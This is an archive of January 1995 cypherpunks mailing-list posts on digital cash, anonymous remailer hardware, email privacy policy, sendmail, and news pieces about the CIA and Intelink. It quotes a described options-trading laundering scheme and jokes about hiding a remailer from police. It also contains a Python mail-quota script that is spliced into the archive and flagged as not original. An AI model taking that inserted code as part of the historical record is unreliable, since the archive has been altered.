* on digital cash: Heidi: "Oh, we're for it! Did you hear what I just
told the interviewer?" (I didn't, as I was in the adjacent room. Later
comments lead me to believe that neither of the Tofflers has a clear
idea of what's going to happen with digital cash and crypto anarchy.)

* on the NSA and the t-shirt I showed them ("Cypherpunks: putting the
NSA out of business"): "Oh, no, we need a strong NSA now more than
ever!"

(What else would I expect? They view the NSA as the main bastion
against terrorists plotting to blow up the World Trade Center. Alvin
was generally more reserved and thoughtful. When I pointed out that
the very hotel room we were in could be used to plot crimes, even
nuclear terrorism, and that the solution to stop this would have to be
an Orwellian regime of continuous monitoring, Alvin nodded
thoughtfully, but Heidi just sniffed. I mention this to give a flavor,
just a whiff, of what senior advisors to the most influential man in
America are thinking.)

* I gave Alvin a copy of my "Crypto Anarchy and Virtual Communities"
paper.

* My interview was pretty disappointing, by the way. Lots of sitting
around, delays in getting my laptop hooked up to Netcom (outside calls
had to be unblocked). The interviewer wanted memorable, quotable stuff
from me, but I felt constricted sitting around and being expected to
spout on cue. Maybe they'll get a few minutes of usable stuff....

(Print media is so much better. An interviewer can let the tape
recorder run for hours, can edit the containing material of a quote,
and can thus produce clear, coherent quotes. A video interview is more
constrained in lots of ways, and offending gestures or rambling
interjections cannot be easily edited out. As one example, at one
point I naturally (to me at least) said something about "As we just
saw...." Well, this made this quote unusable. And so it goes.)

I was generally unhappy with the whole thing. Four hours to get there,
two hours spent waiting around, an hour to resolve problems, an hour
under the camera lights (being told not to move, to "use the mouse,"
to "tell us why cryptography is important," etc.), and five hours to
get home. All for a few minutes at most on a t.v. show.

Oh, the show is the BBC's "Horizons" science series, which may also
get sold to U.S. outlets, etc. I think the title will be "The
Information Bomb," and features segments on information warfare, a la
Winn Schwartau's views, the Tofflers, some military planners,
and--maybe--me.

I don't have high hopes for my segment.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.com (Peter Wayner)
Date: Thu, 19 Jan 95 08:39:36 PST
To: cypherpunks@toad.com
Subject: Anonyous Cash through Options Trading
Message-ID: <ab44451200021004c44d@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



Several months ago, there was a discussion at length about how one
could use the futures and options markets to transfer funds anonymously.
This week's edition of Forbes magazine (Jan 30, 95)
has the headline, "OIL! GUNS! GREED! Was Chase Manhattan ripped off by arms
traffickers?" In the story, Forbes guesses that some suspiciously large
losses in the options market could have been a smoke screen for money
laundering:

  Oil traders do big business in unlisted options, providing
  a further smoke screen. Perkins points to deals in which
  Harris would buy a put option on a cargo of crude from a
  friendly counterpart like Bayoil and resell a similar contract
  in the oil market. If oil prices climbed, the put would expire
  worthless and Bayoil would pocket the price of the option,
  while Arochem would break even. If oil prices dropped, and the
  ultimate buyer exercised the put, Arochem could absorb the
  loss while conveniently neglecting to exercise its put against
  Bayoil, Perkins theorizes. (pg 87)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rparratt@london.micrognosis.com (Richard Parratt)
Date: Thu, 19 Jan 95 03:51:53 PST
To: rparratt@london.micrognosis.com
Subject: Re: Internet, spamming, etc.
Message-ID: <9501191151.AA04857@pero>
MIME-Version: 1.0
Content-Type: text/plain


> > One could theoretically have a package that sprayed UDP packets
> > at a particular IP address, or even have a modified TCP
> > that ignored disconnects. I think most service providers
> > would regard using such code as being on a par with running
> > a program that tried to telnet sequentially to all known IP
> > addresses, trying common passwords on each.
> 
>   Code exists to do all of the things that you've mentioned.
> 
>   That was the original point of the discussion.

No doubt it does. But my assertion is that most service providers
would cut you off if you tried running such code, especially
the latter case.

--
Richard Parratt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arthur Chandler <arthurc@crl.com>
Date: Thu, 19 Jan 95 11:58:06 PST
To: cypherpunks@toad.com
Subject: "Disclosing" private email
Message-ID: <Pine.SUN.3.91.950119115343.15974B-100000@crl7.crl.com>
MIME-Version: 1.0
Content-Type: text/plain



  Greetings! I'd like to solicit your/our best thoughts on the following
message. San Francisco State University is considering a policy of
"disclosing" private email to outside agencies.  I'm aware that such a
policy is yet another argument for using crypto; and the last cypherpunks
meeting gave some encouraging instances of "transparent" encryption
schemes that are not a hassle or a fear-barrier for newbies. 
  But if you could post or private email me your thoughts about the 
legal/ethical aspects of "disclosure," I'd be much obliged.
  I've put a few of my own concerns at the end of the enclosed quote.


---------- Forwarded message ----------

>From: "Deirdre C. Donovan" <deirdre@mercury.sfsu.edu>
>
>I am rewriting the information handouts which we here in San Francisco
>give out to our students when they apply for Internet access accounts.
>The issue with which I am struggling is one of privacy.  I have heard of
>universities (anecdotally only) where the administration reserves the
>right to read E-mail.  Here, we are leaning more toward something like the
>paragraph below, which is taken verbatim from an Indiana University draft
>document.
>
>        IU computing centers will maintain the confidentiality of all
>        information stored on their computing resources.  Requests for
>        disclosure of confidential information will be reviewed by the
>        administrator of the computer system involved.  Such requests
>        will be honored only when approved by University officials
>        authorized by the [President] of the campus involved, or when
>        required by state or federal law.  Except when inappropriate,
>        computer users will receive prior notice of such disclosures.
>

   I'm uneasy about the chain of "prior notice":
  
   1) Does this policy give university administrators the power to read
private email before the decision is made to "disclose" it to outside
persons or agencies? 
 
   2) Does this "prior notice" mean "We're going to do it" or "We plan to do 
it, and if you disagree, let's discuss it before we release it"?
   
   3) What constitutes "inappropriate"?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Thu, 19 Jan 95 12:20:45 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: The Remailer Crisis
In-Reply-To: <199501191847.KAA28985@netcom15.netcom.com>
Message-ID: <199501191958.LAA13462@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



> Jeff's response is exactly what I was hoping for! The "Cypherpunks
> distribution" version of Linux would be a great way to spread cheap
> remailer technology on cheap Linux boxes. Hell, I might even augment
> my Macs with one of these things!

One thing I should've noted is that a Linux-based cheap remailer is
mostly useless without a "live connection" to the Net. That's why I
mentioned hanging these directly off The Little Garden's net (i.e.,
putting the box in the same building as the physical net, to avoid
expensive connections).

What are the cheapest "live connections" (24-hour a day connections)
available? Where I am, about $100 a month, plus whatever the local
phone company charges for a dedicated line. ISDN is an option, but it
looks to cost $400-800 to get started, plus a monthly charge (which I
don't recall, except that I "gulped" when I heard it).

So, even an el cheapo 486-based Linux box, for perhaps $800 or so,
would need to solve the problem of a cheap, continuous connection to
the Net. (My supposition is that one approach is to share these
connections, hence my notion of hanging machines on other people's
nets.)

At $100-200 per month for connect charges, I don't expect a "cheap
Linux distribution" will cause many people to set up remailers.

What have I overlooked?

Are there options for several machines to share a connection? (I'm
sure there are....). Someone who already has a connection may be
willing to host additional machines, which could share some of the
charges.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 19 Jan 95 09:09:32 PST
To: cypherpunks@toad.com
Subject: WSJ on CIA Dump
Message-ID: <199501191708.MAA20858@pipe4.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 
   The Wall Street Journal 
   January 18, 1995, p. A14. 
 
 
   Get Smart -- Eliminate the CIA 
 
 
   By Angelo Codevilla 
 
 
   Over the past several years, U.S. intelligence agencies in 
   general and the CIA in particular have proved themselves 
   incompetent in peacetime and of little use in conflict. 
   Stripped of their mystique and lacking the capacity to 
   reform themselves, these organizations are virtually in 
   receivership. 
 
 
   The maladies ailing the intelligence community are 
   numerous. Independent quality control was never more than 
   a pretense, and competition among intelligence agencies was 
   nonexistent. Producers of intelligence -- rather than the 
   soldiers and diplomats who have to use it -- have also 
   become its judges. All this has spawned a complex of 
   habits, procedures, mentalities and people too entrenched 
   to be repaired and too noxious for any part to form the 
   nucleus of a new, healthy system. Hence, we should take 
   Sen. Daniel Patrick Moynihan's advice, and rethink our 
   intelligence from the ground up. 
 
 
   A good place to start is with the fact that about half of 
   the $28 billion U.S. intelligence budget pays for units 
   directly controlled by military commanders, which routinely 
   provide precise information for the armed forces' 
   operations close to the front lines. The Treasury and State 
   Departments also have their own intelligence units, which 
   fit their needs quite well. So why do we need a national 
   system headed by the CIA? 
 
 
   The original justification for the creation of the CIA in 
   1947 was that intelligence would be best if its gathering 
   and evaluation were divorced as much as possible from the 
   operating departments of government -- State, Defense, etc. 
   -- and placed under the president. This judgment has turned 
   out to be wrong. Because presidents have relied on the CIA 
   to run the system, the result has been a system dominated 
   by the priorities of the producers -- not the users -- of 
   intelligence. 
 
 
   A basic failing is that the CIA has primary responsibility 
   for intelligence and none at all for real world events. The 
   CIA prefers to place its career employees in U.S. 
   embassies, where they pretend to be employees of other 
   parts of the government. Such "case officers" must 
   acknowledge that they are gathering information for the 
   U.S. Another disadvantage is that they don't speak foreign 
   languages well. 
 
 
   And unlike successful reporters, they virtually never know 
   the substantive fields about which they are seeking 
   information. Thus it is unsurprising that they are usually 
   outdone in economic reporting by economic reporters, in 
   military reporting by military reporters, and so forth. 
 
 
   The Aldrich Ames case shows how much more highly the CIA 
   values the smooth functioning of its system than what the 
   system produces. Mr. Ames handed the KGB the capacity to 
   shape the intelligence flowing to top U.S. officials during 
   the endgame of the Cold War. Thus disinformation made 
   presidents and secretaries of state more vulnerable to 
   Gorbomania than the average citizen informed by newspaper 
   accounts. 
 
 
   How could the CIA fail to notice the fishiness of reports 
   generated by a network controlled by the other side? The 
   same way that, in the 1970s and 1980s, the agency had 
   failed to notice that it was passing along reports from a 
   network of agents in Cuba totally controlled by Castro's 
   DGI, and from a network in East Germany all but a few of 
   whose agents were working for the Stasi. In other words, 
   while the Ames case was unusually destructive, it was a 
   typical example of bureaucratic sclerosis. 
 
 
   In the Gulf War, intelligence worsened the farther one got 
   away from the front lines. The national system headed by 
   the CIA misperceived the nature of Saddam Hussein's regime, 
   failed to grasp the obvious signs of attack, and has yet to 
   learn Saddam's military and political reasoning. Our 
   imaging satellites failed to find mobile Scud launchers, 
   and our communications intelligence antennas failed to shed 
   light on the diplomatic intercourse between Saddam and the 
   Soviets. National analysts misjudged Iraq's nuclear 
   program, and were fooled by elementary camouflage. Gen. H. 
   Norman Schwarzkopf's public belittling of CIA-run 
   intelligence was matched by unprintable epithets from field 
   commanders. 
 
 
   What happened in the Gulf would have happened in any 
   conflict because the intelligence community's cameras and 
   antennas were conceived, and its people trained, on the 
   CIA's assumption that cooperative competition with the 
   Soviet Union would last forever and that the basic designs 
   of weapons would not change. Thus cameras, for example, 
   were optimized to take pictures of fixed installations 
   rather than to keep track of attacking military forces or 
   mobile missile launchers. 
 
 
   Long before the Soviet collapse, however, it had become 
   clear that the CIA made bad bets. The age of mobile 
   missiles arrived long ago, and modern weapons are defined 
   by the software they contain rather than by observable 
   features. So what's the point of, for example, analyzing a 
   radar signal that a computer can change in an instant? 
 
 
   Divorce from operational responsibility also tends to make 
   the reports that flow to top officials less valuable than 
   the information used to compile them. (In any given 
   subject, the CIA delivers a consensus of the system's 
   several agencies. It takes far more time for a paper to go 
   through the interagency process than for someone to write 
   the paper. Considering the elementary errors and ignorance 
   that often come out, it is clear that the conferees do not 
   spend much time fact-checking. Intelligence analysts become 
   spin doctors, concerned not with facts but with pushing 
   policy makers in the direction of their parent agencies' 
   prejudices. Hence the ultimate irony: A system whose 
   ostensible reason for being was to eliminate from 
   intelligence the parochial interests of tank drivers, 
   diplomats, bomber pilots, etc. ended up aggregating the 
   prejudices of the analysts -- prejudices unrelieved by the 
   sobering prospect of having to carry out the policies they 
   are pushing for. 
 
 
   The CIA has maintained a monopoly on judging the quality of 
   the system's operations and products. It does not heed 
   presidents, much less their appointees. A decade ago, the 
   agency ignored President Reagan's executive order to 
   reorganize counterintelligence. Two decades ago, President 
   Ford, shocked by how far intelligence estimates were 
   diverging from reality, asked a group of distinguished 
   outsiders (the B team) to see whether the intelligence 
   community's data on Soviet nuclear forces could support 
   conclusions different from those of the insider analysts. 
   The B Team, despite resistance from the agency, came up 
   with results far superior to the insider A Team's. 
 
 
   A better intelligence system should be built on a model 
   radically different from the 1947 original. Each of the 
   major departments of the U.S. government (State, Defense, 
   etc.) should be responsible for gathering and evaluating 
   the information it needs to operate in the new world 
   disorder. Intelligence, in short, should be franchised out 
   to its consumers. There is reason to believe that the 
   departments would do better without the CIA's tutelage than 
   with it. In the past, the armed forces have asked to deploy 
   officers who speak foreign languages, who could blend in 
   with the local population, and who would be experts in the 
   military fields on which they were reporting. U.S. military 
   leaders have also clamored for satellites whose products 
   they could use. Each time, the CIA made sure such requests 
   were denied. If those requests had been granted, the 
   country would be better informed. 
 
 
   In all this there is a need for some central coordination. 
   The several agencies have to mesh their quest for agents 
   abroad, lest they stumble over each other. The information 
   that any part of the government collects must be available 
   to properly cleared people in all other parts, so that any 
   and all analysis can be based on all the facts. 
   Fortunately, maintaining a central registry nowadays 
   requires computers, rather than the bureaucratic monster 
   that arose a half century ago. 
 
 
   Finally the president of the United States' own 
   intelligence needs should be provided by his own staff. 
   Among its duties should be to make sure that all the 
   agencies get each others' estimates. The availability to 
   the president and other top decision makers of contrasting 
   estimates from throughout the government would stimulate 
   better performance all around. So, while there is a role 
   for a central intelligence agency in a system based on 
   consumer sovereignty, there is none for the CIA. 
 
 
   Mr. Codevilla, a fellow at the Hoover Institution, is the 
   author of "Informing Statecraft" (Free Press, 1992).  
 
 
   End 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 19 Jan 95 09:13:29 PST
To: cypherpunks@toad.com
Subject: BYTE on PGP WoT
Message-ID: <199501191712.MAA21219@pipe4.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 
William Stallings writes in the BYTE February issue on "The PGP Web of
Trust."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@scruznet.com>
Date: Thu, 19 Jan 95 13:29:29 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Re: The Remailer Crisis
Message-ID: <Chameleon.4.01.950119132643.jcorgan@jcorgan.sj.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>What are the cheapest "live connections" (24-hour a day connections)
>available? Where I am, about $100 a month, plus whatever the local
>phone company charges for a dedicated line. ISDN is an option, but it
>looks to cost $400-800 to get started, plus a monthly charge (which I
>don't recall, except that I "gulped" when I heard it).

I am currently using ISDN from my home in San Jose.  You're right in 
that the startup costs are the barrier--even a cheap single B channel 
(56K) terminal adapter for use with a serial port will run $300-$400
dollars.  The telco charges are minimal in my area; $25 monthly for
the line itself (115 Kbps async bandwidth).  Connect charges are free 
for non peak usage, and $0.60/hour for peak usage time (0800 to 1700) 
Mon-Fri.

This is the Pacific Bell "Residential" ISDN plan.  For business lines,
it goes up to $50 monthly with $0.60/hour 24 hours a day.

In addition to this would apply any standard long distance charges that
would apply to a particular call.

This is an excellent setup for fast, cheap, INTERMITTENT connection to 
the Internet.  My particular ISP is in Santa Cruz, with POPS in SC, SJ,
and soon Monterey.  An unlimited connect time PPP account runs $75 monthly.
This actually gets me a three bit subnet so that I can put five IP boxes 
and an ISDN router on my ethernet at home.

A remailer in this scenario would need to have their MX record point to
their ISP, and process mail via POP (incoming) and SMTP (outgoing).  
It would be straightforward to implement a timed or demand dial scenario 
(say, every fifteen minutes) to accomplish this.  While not the ideal 
(continuous internet connection with pure SMTP based mail transport), it
would suffice for a moderately loaded remailer, I'd imagine.

Of course, this involves the mail subsystem of your ISP, partially
defeating the purpose of having ubiquitous anonymous remailer "instances"
whose operation is outside the control of an ISP.  Still, it would be
a good start.

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@scruznet.com                    -Isaac Asimov


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLx7Y2E1Diok8GKihAQExmwP8DmWuHMunZoaA4Y8qh7jx56hqgs4p3Bgo
DgHf2J4FoPwzVzXwSH0ep+1tKkHWNnDTXB7UVtuZjLF4uE4HtY72d0ANEfZ0AgPw
9peOBzZoukxpl6nMmHszUBWXxfP4DJW9AvbPdzOWFE1OAMIQLi6mpEyGE3Vouv61
WX+4gzx+4M0=
=iP7S
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: xpat@vm1.spcs.umn.edu
Date: Thu, 19 Jan 95 11:24:54 PST
To: cypherpunks@toad.com
Subject: Remailer-on-a-CD
Message-ID: <9501191924.AA17670@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>The "Linux mavens" followed by the "black box" stuff sparked an idea...

>package.  To make it as easy as possible, I'd use the UMSDOS filesystem so
>that Linux could be installed on a DOS machine without any reformatting
>repartitioning, or similar headaches.

>distribution already has) and some boot options, you'd have an "instant
>remailer" software package, able to transform any 386SX/4MB RAM DOS machine
>or better into a Linux-based remailer site, complete with aliases, logging

>So, am I dreaming, or does this sound viable to y'all?

OK, let's ponder the minimum hardware necessary,
possible minimal configuration (Intel/clone based):

(1) Case.
(2) Power supply.
(3) Motherboard/CPU and 4mb RAM.
(4) Hard drive w/ controller.
(5) modem card.

(5) No monitor, keyboard, floppy, or video card.
   (a) would require some "umbilical cord" connection to initially
       set up from another PC.
   (b) need to operate on "umbilical", direct and uucp modes.

I am just thinking out loud here, but the hardware could be damn
cheap (sub $500). You can find old 386 boards with 4mb right on
the board (no SIMMs) for next to nothing (the decreasing popularity
of 30-pin SIMMs makes this a surplus store reality, as nobody
wants to bother to strip out the RAM chips anymore).

I have also seen an ad by the KILA company in Boulder, CO who
advertise some sort of compact pc-on-a-card deal, that might
be applicable.

Comments?

-------------------------------------------------------------------
P M Dierking |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 19 Jan 95 11:14:28 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: (none)
In-Reply-To: <199501181607.IAA08201@largo.remailer.net>
Message-ID: <9501191913.AA04532@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Hughes says:
> Why sendmail doesn't have anti-spam protection at this point is beyond
> me.  Denial of email service to one user should not deny service to
> all others.  I consider broken any email system that crashes a machine
> because of a disk partition filling.

As a mail administrator for many years, I've never seen a site crash
because of a filling disk partition due to mail overload. I've seen
Sendmail shut itself down temporarily, but that's to be expected. As
for the question of mail overload for one user harming the others, it's
a design decision.  The only alternative is to produce quotas for mail
delivery, which at most of the places I run would be a very bad thing.
Strictly speaking, sendmail has nothing to do with local delivery and
isn't in a position to do any of this anyway -- but it's easy enough to
change the local mailer (which is not part of sendmail) to do quotas
if you like.

Perry
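
The quota-in-the-local-mailer approach mentioned in the message above, as an added example that is not part of the original post and not code from sendmail or any real local mailer. The spool path, limits, function names and the policy (over-quota mail is refused, a nearly full partition defers delivery) are assumptions chosen for illustration.

```python
import fcntl
import os
import re
import sys
import time

# sysexits.h codes an MTA reads from its local mailer.
EX_OK, EX_USAGE, EX_NOUSER, EX_CANTCREAT, EX_TEMPFAIL = 0, 64, 67, 73, 75

QUOTA_BYTES = 2 * 1024 * 1024      # assumed per-mailbox cap
MIN_FREE_BYTES = 5 * 1024 * 1024   # assumed reserve kept free on the spool partition
SAFE_USER = re.compile(r"[a-z_][a-z0-9_.-]{0,31}")


def partition_free_bytes(path):
    """Bytes available to unprivileged writers on the filesystem holding path."""
    st = os.statvfs(path)
    return st.f_bavail * st.f_frsize


def mbox_frame(message, sender="MAILER-DAEMON"):
    """Wrap one message in mbox framing, escaping lines that start with 'From '."""
    lines = message.replace(b"\r\n", b"\n").split(b"\n")
    lines = [b">" + ln if ln.startswith(b"From ") else ln for ln in lines]
    stamp = time.strftime("%a %b %d %H:%M:%S %Y", time.gmtime()).encode()
    body = b"\n".join(lines).rstrip(b"\n")
    return b"From " + sender.encode() + b" " + stamp + b"\n" + body + b"\n\n"


def deliver(spool_dir, user, message, quota=QUOTA_BYTES,
            min_free=MIN_FREE_BYTES, free_bytes=partition_free_bytes):
    """Append message to spool_dir/user and return a sysexits code."""
    # Refuse names that could escape the spool directory.
    if not SAFE_USER.fullmatch(user):
        return EX_NOUSER
    framed = mbox_frame(message)
    # Partition nearly full: defer, so the MTA keeps the message queued and retries.
    if free_bytes(spool_dir) - len(framed) < min_free:
        return EX_TEMPFAIL
    path = os.path.join(spool_dir, user)
    flags = os.O_WRONLY | os.O_APPEND | os.O_CREAT | os.O_NOFOLLOW
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "ab") as box:
        # Size check and write happen under one lock, so concurrent
        # deliveries cannot jointly overshoot the quota.
        fcntl.flock(box.fileno(), fcntl.LOCK_EX)
        if os.fstat(box.fileno()).st_size + len(framed) > quota:
            # This user's mailbox is full: fail this delivery only.
            return EX_CANTCREAT
        box.write(framed)
        box.flush()
        os.fsync(box.fileno())
    return EX_OK


def main(argv):
    """Invoked by the MTA as: <program> <user>, with the message on stdin."""
    if len(argv) != 2:
        return EX_USAGE
    return deliver("/var/mail", argv[1], sys.stdin.buffer.read())


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```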




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 19 Jan 95 11:30:17 PST
To: cypherpunks@toad.com
Subject: Re: Cone of silence update
Message-ID: <9501191925.AA27121@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


---------- Begin Forwarded Message ----------
Date: Wed, 18 Jan 95 21:03:02 -0500
From: burton@het.brown.edu (Joshua W. Burton)
To: silent-tristero@world.std.com
Subject: Cone of silence update


I haven't been able to turn up the original New York Times article I saw,
but our own Providence (RI) Journal today reprinted an article from the
Washington Post, no date given, that tells substantially the same story,
though without any mention of the cost of Intelink.  Since a few people
have asked me for details, I thought I'd better post this verbatim.  Be
sure to save a copy, in case this article disappears the way the first
one I saw did....

GOVERNMENT'S SECRETS FLOW THROUGH AN INTERNET CLONE

WASHINGTON - When the US intelligence community recently decided to
modernize the way it communicates, it did what countless other 
government agencies, businesses and individuals have done over the
last few years:  it turned to the Internet.

But the regular Internet wouldn't do.  For spies and other government
officials concerned about secrecy, that very public, very uncontrollable
global mesh of computer networks was too risky a place to do business.

So the intelligence community created its own Internet.

Dubbed Intelink and based on the same technology used to run and
navigate the original Internet, this new network for sharing supersecret
information---including satellite imagery and video footage---officially
began operating just a few weeks ago.

When the bugs are worked out and a final system is in place, it will 
allow analysts, policy-makers, military officials and soldiers in the
field to tap quickly and directly into classified information at the
Central Intelligence Agency, the National Security Agency, the Pentagon
and diverse other parts of the national security bureaucracy.

Those familiar with Intelink say it could promote cooperation in a 
business characterized by internecine rivalry, and that at the very
least it will centralize and speed up information retrieval.

``This is a major breakthrough,'' said Barry Horton, principal deputy
assistant secretary of defense for command, control, communications
and intelligence.

``Intelink for the first time, in a user-friendly environment, allows
every element of the intelligence community and every element of the
Department of Defense to reach into every other element,'' he said.

As one might imagine, it's not for everybody.  Horton said the system
is now available only to people with ``Top Secret'' or higher security
clearances.

Moreover, those who run the system eventually will have to confront a
major issue of how to make Intelink flexible enough to accommodate
users with a variety of clearances.  There are many levels of 
classification higher than Top Secret, and for Intelink to be useful
to those working on the most secret programs, the officials 
responsible would have to be comfortable placing such information
on the system.

And, while Pentagon and CIA officials spoke of how Intelink promises
to improve communication and cooperation among the agencies and
reduce duplication of effort, others said there is good reason to
be skeptical.  The intelligence community has made innumerable
attempts to eliminate redundancy and streamline information channels,
but there has been little progress.

``It's gone like gangbusters since its inception, but any Internet-like
thing grows overnight.  The question is, is it going to mature well?
And how will it operate in a time of crisis?'' said Ross Stapleton-Gray,
who recently left the CIA to start a business providing Internet 
services to embassies in Washington.

In a way it is fitting that what some call an Internet ``clone'' should
come out of the national security bureaucracy.  Internet itself was
started under Department of Defense sponsorship in the 1960s, as an
attack-proof communications link among military, corporate and university
research centers.

``Remember, Internet is a DoD creation,'' said Neil Munro, a reporter
for Washington_Technology, a local business newspaper, who recently
broke the story about Intelink's start-up.  ``This is the prodigal
son....They created it and now it comes back in much stronger fashion.''

All those familiar with the system said it is totally walled off from
the Internet, and designed never to be penetrated.  But several
experts familiar with Intelink noted that no system is ever totally
secure.

``This would obviously be a Mount Everest for hackers,'' said John E.
Pike of the Federation of American Scientists.  But Pike, who said he
thinks Intelink has the potential to ``revolutionize'' the intelligence
community, added that it would be so difficult to crack he doubts
many will try.

The network now operates among several dozen intelligence agencies
and centers.  But it is the talk of the intelligence community, and
its reach is expected to grow rapidly.  Those who now have regular
access to it number in the hundreds, estimated Martin C. Faga,
general manager of the Center for Integrated Intelligence Systems
at the Mitre Corp., the company that helped the intelligence agencies
set up the system.
----------- End Forwarded Message -----------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "david d `zoo' zuhn" <zoo@armadillo.com>
Date: Thu, 19 Jan 95 12:58:27 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: The Remailer Crisis
Message-ID: <199501192056.OAA24035@monad.armadillo.com>
MIME-Version: 1.0
Content-Type: text/plain


//  Are there options for several machines to share a connection? (I'm
//  sure there are....). Someone who already has a connection may be
//  willing to host additional machines, which could share some of the
//  charges.

Around here (in the Twin Cities) one can get a dedicated connection for
$100/month without any startup fees.  And of course one can set up a local
network and use the machine with the modem link as a router.

Having one of these dedicated lines, I'd be happy to host remailer-boxes at
my site.  Ideally, they'll be small & only require a network cable and a
power cord.  

I'm also willing to seriously consider initiating remailer-accounts on my
machine.  If you'd be interested in a remailer account, drop me a line.


  -- 
  -  david d `zoo' zuhn  -| armadillo zoo software -- St. Paul, Minnesota
  --  zoo@armadillo.com --|   unix generalist (and occasional specialist)
  ------------------------+   http://www.armadillo.com/ for more information
    pgp key upon request  +----------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jalicqui@prairienet.org (Jeff Licquia)
Date: Thu, 19 Jan 95 13:05:11 PST
To: cypherpunks@toad.com
Subject: Re: Remailer-on-a-CD
Message-ID: <9501192105.AA29392@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


>>The "Linux mavens" followed by the "black box" stuff sparked an idea...
>
>>package.  To make it as easy as possible, I'd use the UMSDOS filesystem so
>>that Linux could be installed on a DOS machine without any reformatting
>>repartitioning, or similar headaches.
>
>>distribution already has) and some boot options, you'd have an "instant
>>remailer" software package, able to transform any 386SX/4MB RAM DOS machine
>>or better into a Linux-based remailer site, complete with aliases, logging
>
>>So, am I dreaming, or does this sound viable to y'all?
>
>OK, let's ponder the minimum hardware necessary,
>possible minimal configuration (Intel/clone based):
>
>(1) Case.
>(2) Power supply.
>(3) Motherboard/CPU and 4mb RAM.
>(4) Hard drive w/ controller.
>(5) modem card.

Add "standard serial port" here, for reasons I'll get into in a moment...

>(5) No monitor, keyboard, floppy, or video card.
>   (a) would require some "umbilical cord" connection to initially
>       set up from another PC.
>   (b) need to operate on "umbilical", direct and uucp modes.

The "umbilical cord" here could be a standard serial port; this could be
used in several ways.  In addition, Linux has the ability to do TCP/IP
through the parallel ports (using a LapLink-style protocol), so that could
possibly work as well.

There are a few options here:

Reuse the monitor, keyboard, etc. for each installation.

Go ahead and throw in the floppy, and set up the Linux kernel on the floppy
to use the serial port as the console instead of the monitor/keyboard.

Connect your second PC using the PLIP (that's the parallel port IP stuff)
protocol.  On the second PC, one would run a program that would telnet to
the first PC and run the install program, which would run via NFS on the
PLIP line.

>I am just thinking out loud here, but the hardware could be damn
>cheap (sub $500). You can find old 386 boards with 4mb right on
>the board (no SIMMs) for next to nothing (the decreasing popularity
>of 30-pin SIMMs makes this a surplus store reality, as nobody
>wants to bother to strip out the RAM chips anymore).

As far as price, I've seen 386SX motherboards run for $99.  At a going rate
of $50 per MB of RAM, buying a used MFM disk and controller for, say, $40 (I
had the option of buying a junk box full of stuff, including two 20MB drives
and a 10MB, for $100), some cheap $10 everything-board, a $70 14.4 modem,
and a power supply at $50 (here I may be way off), that adds up to... $470.
Not a bad guess!  And this assumes you pay new prices for the motherboard,
RAM, multiport, modem, and power supply...

Also, if you wanted to splurge, you could opt for a few more MB of RAM and a
CD-ROM drive.  With our recently pressed "Cypherpunk Toolkit" CD-ROMs :-)
and a boot floppy, you wouldn't necessarily need to install anything at all;
the Linux kernel could store site-specific info (entered the first time you
booted up via a cute user-friendly interface) on the floppy and load it to a
RAMdisk, mounting the CD-ROM for all the rest of the interesting stuff.  On
multipurpose systems (you only use the computer a few hours per day and run
the remailer using some store-and-forward system the rest of the time), this
wouldn't take up any hard disk space, and your remailer could conveniently
disappear with a simple Ctrl-Alt-Del and the slam of a safe door.  ("But
officer, all I have on my hard drive is DOS and Windows.  See for yourself!
I don't even have PGP here...")

You know, the more I think about this, the more ideas pop into my head.  I'd
better quit before I get dizzy...  What if the site-specific stuff on the
